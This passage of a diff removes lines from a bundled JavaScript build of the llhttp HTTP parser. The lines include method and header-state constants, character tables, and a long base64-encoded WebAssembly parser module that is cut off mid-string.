= 15] = "UNLOCK"; - METHODS[METHODS["BIND"] = 16] = "BIND"; - METHODS[METHODS["REBIND"] = 17] = "REBIND"; - METHODS[METHODS["UNBIND"] = 18] = "UNBIND"; - METHODS[METHODS["ACL"] = 19] = "ACL"; - /* subversion */ - METHODS[METHODS["REPORT"] = 20] = "REPORT"; - METHODS[METHODS["MKACTIVITY"] = 21] = "MKACTIVITY"; - METHODS[METHODS["CHECKOUT"] = 22] = "CHECKOUT"; - METHODS[METHODS["MERGE"] = 23] = "MERGE"; - /* upnp */ - METHODS[METHODS["M-SEARCH"] = 24] = "M-SEARCH"; - METHODS[METHODS["NOTIFY"] = 25] = "NOTIFY"; - METHODS[METHODS["SUBSCRIBE"] = 26] = "SUBSCRIBE"; - METHODS[METHODS["UNSUBSCRIBE"] = 27] = "UNSUBSCRIBE"; - /* RFC-5789 */ - METHODS[METHODS["PATCH"] = 28] = "PATCH"; - METHODS[METHODS["PURGE"] = 29] = "PURGE"; - /* CalDAV */ - METHODS[METHODS["MKCALENDAR"] = 30] = "MKCALENDAR"; - /* RFC-2068, section 19.6.1.2 */ - METHODS[METHODS["LINK"] = 31] = "LINK"; - METHODS[METHODS["UNLINK"] = 32] = "UNLINK"; - /* icecast */ - METHODS[METHODS["SOURCE"] = 33] = "SOURCE"; - /* RFC-7540, section 11.6 */ - METHODS[METHODS["PRI"] = 34] = "PRI"; - /* RFC-2326 RTSP */ - METHODS[METHODS["DESCRIBE"] = 35] = "DESCRIBE"; - METHODS[METHODS["ANNOUNCE"] = 36] = "ANNOUNCE"; - METHODS[METHODS["SETUP"] = 37] = "SETUP"; - METHODS[METHODS["PLAY"] = 38] = "PLAY"; - METHODS[METHODS["PAUSE"] = 39] = "PAUSE"; - METHODS[METHODS["TEARDOWN"] = 40] = "TEARDOWN"; - METHODS[METHODS["GET_PARAMETER"] = 41] = "GET_PARAMETER"; - METHODS[METHODS["SET_PARAMETER"] = 42] = "SET_PARAMETER"; - METHODS[METHODS["REDIRECT"] = 43] = "REDIRECT"; - METHODS[METHODS["RECORD"] = 44] = "RECORD"; - /* RAOP */ - METHODS[METHODS["FLUSH"] = 45] = "FLUSH"; -})(METHODS = exports.METHODS || (exports.METHODS = {})); -exports.METHODS_HTTP = [ - METHODS.DELETE, - METHODS.GET, - METHODS.HEAD, - METHODS.POST, - METHODS.PUT, - METHODS.CONNECT, - METHODS.OPTIONS, - METHODS.TRACE, - METHODS.COPY, - METHODS.LOCK, - METHODS.MKCOL, - METHODS.MOVE, - METHODS.PROPFIND, - METHODS.PROPPATCH, - METHODS.SEARCH, - METHODS.UNLOCK, - METHODS.BIND, - METHODS.REBIND, - METHODS.UNBIND, - METHODS.ACL, - METHODS.REPORT, - METHODS.MKACTIVITY, - METHODS.CHECKOUT, - METHODS.MERGE, - METHODS['M-SEARCH'], - METHODS.NOTIFY, - METHODS.SUBSCRIBE, - METHODS.UNSUBSCRIBE, - METHODS.PATCH, - METHODS.PURGE, - METHODS.MKCALENDAR, - METHODS.LINK, - METHODS.UNLINK, - METHODS.PRI, - // TODO(indutny): should we allow it with HTTP? - METHODS.SOURCE, -]; -exports.METHODS_ICE = [ - METHODS.SOURCE, -]; -exports.METHODS_RTSP = [ - METHODS.OPTIONS, - METHODS.DESCRIBE, - METHODS.ANNOUNCE, - METHODS.SETUP, - METHODS.PLAY, - METHODS.PAUSE, - METHODS.TEARDOWN, - METHODS.GET_PARAMETER, - METHODS.SET_PARAMETER, - METHODS.REDIRECT, - METHODS.RECORD, - METHODS.FLUSH, - // For AirPlay - METHODS.GET, - METHODS.POST, -]; -exports.METHOD_MAP = utils_1.enumToMap(METHODS); -exports.H_METHOD_MAP = {}; -Object.keys(exports.METHOD_MAP).forEach((key) => { - if (/^H/.test(key)) { - exports.H_METHOD_MAP[key] = exports.METHOD_MAP[key]; - } -}); -var FINISH; -(function (FINISH) { - FINISH[FINISH["SAFE"] = 0] = "SAFE"; - FINISH[FINISH["SAFE_WITH_CB"] = 1] = "SAFE_WITH_CB"; - FINISH[FINISH["UNSAFE"] = 2] = "UNSAFE"; -})(FINISH = exports.FINISH || (exports.FINISH = {})); -exports.ALPHA = []; -for (let i = 'A'.charCodeAt(0); i <= 'Z'.charCodeAt(0); i++) { - // Upper case - exports.ALPHA.push(String.fromCharCode(i)); - // Lower case - exports.ALPHA.push(String.fromCharCode(i + 0x20)); -} -exports.NUM_MAP = { - 0: 0, 1: 1, 2: 2, 3: 3, 4: 4, - 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, -}; -exports.HEX_MAP = { - 0: 0, 1: 1, 2: 2, 3: 3, 4: 4, - 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, - A: 0XA, B: 0XB, C: 0XC, D: 0XD, E: 0XE, F: 0XF, - a: 0xa, b: 0xb, c: 0xc, d: 0xd, e: 0xe, f: 0xf, -}; -exports.NUM = [ - '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', -]; -exports.ALPHANUM = exports.ALPHA.concat(exports.NUM); -exports.MARK = ['-', '_', '.', '!', '~', '*', '\'', '(', ')']; -exports.USERINFO_CHARS = exports.ALPHANUM - .concat(exports.MARK) - .concat(['%', ';', ':', '&', '=', '+', '$', ',']); -// TODO(indutny): use RFC -exports.STRICT_URL_CHAR = [ - '!', '"', '$', '%', '&', '\'', - '(', ')', '*', '+', ',', '-', '.', '/', - ':', ';', '<', '=', '>', - '@', '[', '\\', ']', '^', '_', - '`', - '{', '|', '}', '~', -].concat(exports.ALPHANUM); -exports.URL_CHAR = exports.STRICT_URL_CHAR - .concat(['\t', '\f']); -// All characters with 0x80 bit set to 1 -for (let i = 0x80; i <= 0xff; i++) { - exports.URL_CHAR.push(i); -} -exports.HEX = exports.NUM.concat(['a', 'b', 'c', 'd', 'e', 'f', 'A', 'B', 'C', 'D', 'E', 'F']); -/* Tokens as defined by rfc 2616. Also lowercases them. - * token = 1* - * separators = "(" | ")" | "<" | ">" | "@" - * | "," | ";" | ":" | "\" | <"> - * | "/" | "[" | "]" | "?" | "=" - * | "{" | "}" | SP | HT - */ -exports.STRICT_TOKEN = [ - '!', '#', '$', '%', '&', '\'', - '*', '+', '-', '.', - '^', '_', '`', - '|', '~', -].concat(exports.ALPHANUM); -exports.TOKEN = exports.STRICT_TOKEN.concat([' ']); -/* - * Verify that a char is a valid visible (printable) US-ASCII - * character or %x80-FF - */ -exports.HEADER_CHARS = ['\t']; -for (let i = 32; i <= 255; i++) { - if (i !== 127) { - exports.HEADER_CHARS.push(i); - } -} -// ',' = \x44 -exports.CONNECTION_TOKEN_CHARS = exports.HEADER_CHARS.filter((c) => c !== 44); -exports.MAJOR = exports.NUM_MAP; -exports.MINOR = exports.MAJOR; -var HEADER_STATE; -(function (HEADER_STATE) { - HEADER_STATE[HEADER_STATE["GENERAL"] = 0] = "GENERAL"; - HEADER_STATE[HEADER_STATE["CONNECTION"] = 1] = "CONNECTION"; - HEADER_STATE[HEADER_STATE["CONTENT_LENGTH"] = 2] = "CONTENT_LENGTH"; - HEADER_STATE[HEADER_STATE["TRANSFER_ENCODING"] = 3] = "TRANSFER_ENCODING"; - HEADER_STATE[HEADER_STATE["UPGRADE"] = 4] = "UPGRADE"; - HEADER_STATE[HEADER_STATE["CONNECTION_KEEP_ALIVE"] = 5] = "CONNECTION_KEEP_ALIVE"; - HEADER_STATE[HEADER_STATE["CONNECTION_CLOSE"] = 6] = "CONNECTION_CLOSE"; - HEADER_STATE[HEADER_STATE["CONNECTION_UPGRADE"] = 7] = "CONNECTION_UPGRADE"; - HEADER_STATE[HEADER_STATE["TRANSFER_ENCODING_CHUNKED"] = 8] = "TRANSFER_ENCODING_CHUNKED"; -})(HEADER_STATE = exports.HEADER_STATE || (exports.HEADER_STATE = {})); -exports.SPECIAL_HEADERS = { - 'connection': HEADER_STATE.CONNECTION, - 'content-length': HEADER_STATE.CONTENT_LENGTH, - 'proxy-connection': HEADER_STATE.CONNECTION, - 'transfer-encoding': HEADER_STATE.TRANSFER_ENCODING, - 'upgrade': HEADER_STATE.UPGRADE, -}; -//# sourceMappingURL=constants.js.map - -/***/ }), - -/***/ 1145: -/***/ ((module) => { - -module.exports = 'AGFzbQEAAAABMAhgAX8Bf2ADf39/AX9gBH9/f38Bf2AAAGADf39/AGABfwBgAn9/AGAGf39/f39/AALLAQgDZW52GHdhc21fb25faGVhZGVyc19jb21wbGV0ZQACA2VudhV3YXNtX29uX21lc3NhZ2VfYmVnaW4AAANlbnYLd2FzbV9vbl91cmwAAQNlbnYOd2FzbV9vbl9zdGF0dXMAAQNlbnYUd2FzbV9vbl9oZWFkZXJfZmllbGQAAQNlbnYUd2FzbV9vbl9oZWFkZXJfdmFsdWUAAQNlbnYMd2FzbV9vbl9ib2R5AAEDZW52GHdhc21fb25fbWVzc2FnZV9jb21wbGV0ZQAAA0ZFAwMEAAAFAAAAAAAABQEFAAUFBQAABgAAAAAGBgYGAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAAABAQcAAAUFAwABBAUBcAESEgUDAQACBggBfwFBgNQECwfRBSIGbWVtb3J5AgALX2luaXRpYWxpemUACRlfX2luZGlyZWN0X2Z1bmN0aW9uX3RhYmxlAQALbGxodHRwX2luaXQAChhsbGh0dHBfc2hvdWxkX2tlZXBfYWxpdmUAQQxsbGh0dHBfYWxsb2MADAZtYWxsb2MARgtsbGh0dHBfZnJlZQANBGZyZWUASA9sbGh0dHBfZ2V0X3R5cGUADhVsbGh0dHBfZ2V0X2h0dHBfbWFqb3IADxVsbGh0dHBfZ2V0X2h0dHBfbWlub3IAEBFsbGh0dHBfZ2V0X21ldGhvZAARFmxsaHR0cF9nZXRfc3RhdHVzX2NvZGUAEhJsbGh0dHBfZ2V0X3VwZ3JhZGUAEwxsbGh0dHBfcmVzZXQAFA5sbGh0dHBfZXhlY3V0ZQAVFGxsaHR0cF9zZXR0aW5nc19pbml0ABYNbGxodHRwX2ZpbmlzaAAXDGxsaHR0cF9wYXVzZQAYDWxsaHR0cF9yZXN1bWUAGRtsbGh0dHBfcmVzdW1lX2FmdGVyX3VwZ3JhZGUAGhBsbGh0dHBfZ2V0X2Vycm5vABsXbGxodHRwX2dldF9lcnJvcl9yZWFzb24AHBdsbGh0dHBfc2V0X2Vycm9yX3JlYXNvbgAdFGxsaHR0cF9nZXRfZXJyb3JfcG9zAB4RbGxodHRwX2Vycm5vX25hbWUAHxJsbGh0dHBfbWV0aG9kX25hbWUAIBJs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ADcDACAAQShqQgA3AwAgAEEgakIANwMAIABBEGpCADcDACAAQQhqQgA3AwAgAEHdATYCHEEAC3sBAX8CQCAAKAIMIgMNAAJAIAAoAgRFDQAgACABNgIECwJAIAAgASACEMSAgIAAIgMNACAAKAIMDwsgACADNgIcQQAhAyAAKAIEIgFFDQAgACABIAIgACgCCBGBgICAAAAiAUUNACAAIAI2AhQgACABNgIMIAEhAwsgAwvk8wEDDn8DfgR/I4CAgIAAQRBrIgMkgICAgAAgASEEIAEhBSABIQYgASEHIAEhCCABIQkgASEKIAEhCyABIQwgASENIAEhDiABIQ8CQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAgACgCHCIQQX9qDt0B2gEB2QECAwQFBgcICQoLDA0O2AEPENcBERLWARMUFRYXGBkaG+AB3wEcHR7VAR8gISIjJCXUASYnKCkqKyzTAdIBLS7RAdABLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVG2wFHSElKzwHOAUvNAUzMAU1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4ABgQGCAYMBhAGFAYYBhwGIAYkBigGLAYwBjQGOAY8BkAGRAZIBkwGUAZUBlgGXAZgBmQGaAZsBnAGdAZ4BnwGgAaEBogGjAaQBpQGmAacBqAGpAaoBqwGsAa0BrgGvAbABsQGyAbMBtAG1AbYBtwHLAcoBuAHJAbkByAG6AbsBvAG9Ab4BvwHAAcEBwgHDAcQBxQHGAQDcAQtBACEQDMYBC0EOIRAMxQELQQ0hEAzEAQtBDyEQDMMBC0EQIRAMwgELQRMhEAzBAQtBFCEQDMABC0EVIRAMvwELQRYhEAy+AQtBFyEQDL0BC0EYIRAMvAELQRkhEAy7AQtBGiEQDLoBC0EbIRAMuQELQRwhEAy4AQtBCCEQDLcBC0EdIRAMtgELQSAhEAy1AQtBHyEQDLQBC0EHIRAMswELQSEhEAyyAQtBIiEQDLEBC0EeIRAMsAELQSMhEAyvAQtBEiEQDK4BC0ERIRAMrQELQSQhEAysAQtBJSEQDKsBC0EmIRAMqgELQSchEAypAQtBwwEhEAyoAQtBKSEQDKcBC0ErIRAMpgELQSwhEAylAQtBLSEQDKQBC0EuIRAMowELQS8hEAyiAQtBxAEhEAyhAQtBMCEQDKABC0E0IRAMnwELQQwhEAyeAQtBMSEQDJ0BC0EyIRAMnAELQTMhEAybAQtBOSEQDJoBC0E1IRAMmQELQcUBIRAMmAELQQshEAyXAQtBOiEQDJYBC0E2IRAMlQELQQohEAyUAQtBNyEQDJMBC0E4IRAMkgELQTwhEAyRAQtBOyEQDJABC0E9IRAMjwELQQkhEAyOAQtBKCEQDI0BC0E+IRAMjAELQT8hEAyLAQtBwAAhEAyKAQtBwQAhEAyJAQtBwgAhEAyIAQtBwwAhEAyHAQtBxAAhEAyGAQtBxQAhEAyFAQtBxgAhEAyEAQtBKiEQDIMBC0HHACEQDIIBC0HIACEQDIEBC0HJACEQDIABC0HKACEQDH8LQcsAIRAMfgtBzQAhEAx9C0HMACEQDHwLQc4AIRAMewtBzwAhEAx6C0HQACEQDHkLQdEAIRAMeAtB0gAhEAx3C0HTACEQDHYLQdQAIRAMdQtB1gAhEAx0C0HVACEQDHMLQQYhEAxyC0HXACEQDHELQQUhEAxwC0HYACEQDG8LQQQhEAxuC0HZACEQDG0LQdoAIRAMbAtB2wAhEAxrC0HcACEQDGoLQQMhEAxpC0HdACEQDGgLQd4AIRAMZwtB3wAhEAxmC0HhACEQDGULQeAAIRAMZAtB4gAhEAxjC0HjACEQDGILQQIhEAxhC0HkACEQDGALQeUAIRAMXwtB5gAhEAxeC0HnACEQDF0LQegAIRAMXAtB6QAhEAxbC0HqACEQDFoLQesAIRAMWQtB7AAhEAxYC0HtACEQDFcLQe4AIRAMVgtB7wAhEAxVC0HwACEQDFQLQfEAIRAMUwtB8gAhEAxSC0HzACEQDFELQfQAIRAMUAtB9QAhEAxPC0H2ACEQDE4LQfcAIRAMTQtB+AAhEAxMC0H5ACEQDEsLQfoAIRAMSgtB+wAhEAxJC0H8ACEQDEgLQf0AIRAMRwtB/gAhEAxGC0H/ACEQDEULQYABIRAMRAtBgQEhEAxDC0GCASEQDEILQYMBIRAMQQtBhAEhEAxAC0GFASEQDD8LQYYBIRAMPgtBhwEhEAw9C0GIASEQDDwLQYkBIRAMOwtBigEhEAw6C0GLASEQDDkLQYwBIRAMOAtBjQEhEAw3C0GOASEQDDYLQY8BIRAMNQtBkAEhEAw0C0GRASEQDDMLQZIBIRAMMgtBkwEhEAwxC0GUASEQDDALQZUBIRAMLwtBlgEhEAwuC0GXASEQDC0LQZgBIRAMLAtBmQEhEAwrC0GaASEQDCoLQZsBIRAMKQtBnAEhEAwoC0GdASEQDCcLQZ4BIRAMJgtBnwEhEAwlC0GgASEQDCQLQaEBIRAMIwtBogEhEAwiC0GjASEQDCELQaQBIRAMIAtBpQEhEAwfC0GmASEQDB4LQacBIRAMHQtBqAEhEAwcC0GpASEQDBsLQaoBIRAMGgtBqwEhEAwZC0GsASEQDBgLQa0BIRAMFwtBrgEhEAwWC0EBIRAMFQtBrwEhEAwUC0GwASEQDBMLQbEBIRAMEgtBswEhEAwRC0GyASEQDBALQbQBIRAMDwtBtQEhEAwOC0G2ASEQDA0LQbcBIRAMDAtBuAEhEAwLC0G5ASEQDAoLQboBIRAMCQtBuwEhEAwIC0HGASEQDAcLQbwBIRAMBgtBvQEhEAwFC0G+ASEQDAQLQb8BIRAMAwtBwAEhEAwCC0HCASEQDAELQcEBIRALA0ACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQA